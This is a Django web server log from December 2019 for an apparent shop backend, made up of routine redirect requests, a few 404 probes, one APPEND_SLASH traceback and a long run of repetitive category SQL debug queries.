302 0 [21/Dec/2019 09:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:16:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:22:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:27:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:32:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:37:09] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:45:52] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:46:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:51:49] "GET / HTTP/1.0" 302 0 [21/Dec/2019 09:56:51] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:20:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:25:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 10:30:16] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:35:18] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:42:57] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:47:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 10:53:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:00:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:15:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:20:56] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:24:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:25:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:33:04] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:38:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:43:12] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:48:15] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:53:52] "GET / HTTP/1.0" 302 0 [21/Dec/2019 11:58:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 12:05:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:20:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:20:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:26:54] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:31:56] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:36:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:45:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:50:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 12:55:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:03:42] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:05:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:10:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:11:53] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:16:55] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:21:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:27:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:32:48] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:37:25] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:38:15] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:43:18] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:52:16] "GET / HTTP/1.0" 302 0 [21/Dec/2019 13:52:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 13:52:28,926 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8kwaexcp7huaz08secdcc9jnx23cjg8w' LIMIT 1; args=('8kwaexcp7huaz08secdcc9jnx23cjg8w',) DEBUG 2019-12-21 13:52:28,927 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8kwaexcp7huaz08secdcc9jnx23cjg8w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T13:52:28.926555+00:00'::timestamptz); args=('8kwaexcp7huaz08secdcc9jnx23cjg8w', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 13, 52, 28, 926555, tzinfo=)) [21/Dec/2019 13:52:28] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 13:57:19] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:23:57] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:29:13] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:34:56] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:43:35] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:48:37] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:53:40] "GET / HTTP/1.0" 302 0 [21/Dec/2019 14:58:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:05:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:15:07] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:20:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 15:25:12] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:34:47] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:40:02] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:45:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:50:07] "GET / HTTP/1.0" 302 0 [21/Dec/2019 15:56:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:13:40] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:15:09] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:18:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:23:45] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:26:50] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:28:48] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:33:50] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 16:38:53] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:43:56] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:48:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:54:01] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:56:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 16:59:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 17:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:19:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [21/Dec/2019 17:26:46] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [21/Dec/2019 17:26:48] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=187 HTTP/1.0" 404 6532 Not Found: /newslist.asp [21/Dec/2019 17:26:49] "GET /newslist.asp?type=4&id=1335 HTTP/1.0" 404 6476 [21/Dec/2019 17:27:59] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:31:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:37:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:42:12] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [21/Dec/2019 17:44:59] "POST /editBlackAndWhiteList HTTP/1.0" 500 63902 [21/Dec/2019 17:47:14] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:52:17] "GET / HTTP/1.0" 302 0 [21/Dec/2019 17:58:32] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:10:05] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:15:08] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:20:11] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:25:14] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:27:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:31:43] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:33:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 18:33:58,417 utils 4252 140031503103744 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'v0c2h4s4k0jslm1x6q0d6aeffczjiief' LIMIT 1; args=('v0c2h4s4k0jslm1x6q0d6aeffczjiief',) DEBUG 2019-12-21 18:33:58,421 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('v0c2h4s4k0jslm1x6q0d6aeffczjiief', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-04T18:33:58.418655+00:00'::timestamptz); args=('v0c2h4s4k0jslm1x6q0d6aeffczjiief', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 4, 18, 33, 58, 418655, tzinfo=)) [21/Dec/2019 18:33:58] "GET /login/?next=/ HTTP/1.0" 200 1786 [21/Dec/2019 18:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [21/Dec/2019 18:36:46] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:44:58] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:52:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 18:57:06] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:05:03] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:14:10] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:14:15] "GET / HTTP/1.0" 302 0 [21/Dec/2019 19:19:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-21 19:23:19,588 utils 4252 140031503103744 (0.010) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-21 19:23:19,601 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-21 19:23:19,607 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-21 19:23:19,611 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-21 19:23:19,614 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-21 19:23:19,619 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-21 19:23:19,621 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-21 19:23:19,623 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-21 19:23:19,626 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-21 19:23:19,629 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-21 19:23:19,631 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-21 19:23:19,634 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-21 19:23:19,636 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-21 19:23:19,639 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-21 19:23:19,642 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-21 19:23:19,644 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-21 19:23:19,647 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-21 19:23:19,650 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-21 19:23:19,652 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-21 19:23:19,656 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-21 19:23:19,659 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-21 19:23:19,662 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-21 19:23:19,664 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-21 19:23:19,666 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-21 19:23:19,669 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-21 19:23:19,674 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-21 19:23:19,676 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-21 19:23:19,678 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-21 19:23:19,681 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-21 19:23:19,684 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-21 19:23:19,687 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-21 19:23:19,689 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-21 19:23:19,692 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-21 19:23:19,694 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-21 19:23:19,696 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-21 19:23:19,700 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-21 19:23:19,702 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-21 19:23:19,704 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-21 19:23:19,706 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-21 19:23:19,709 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-21 19:23:19,711 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 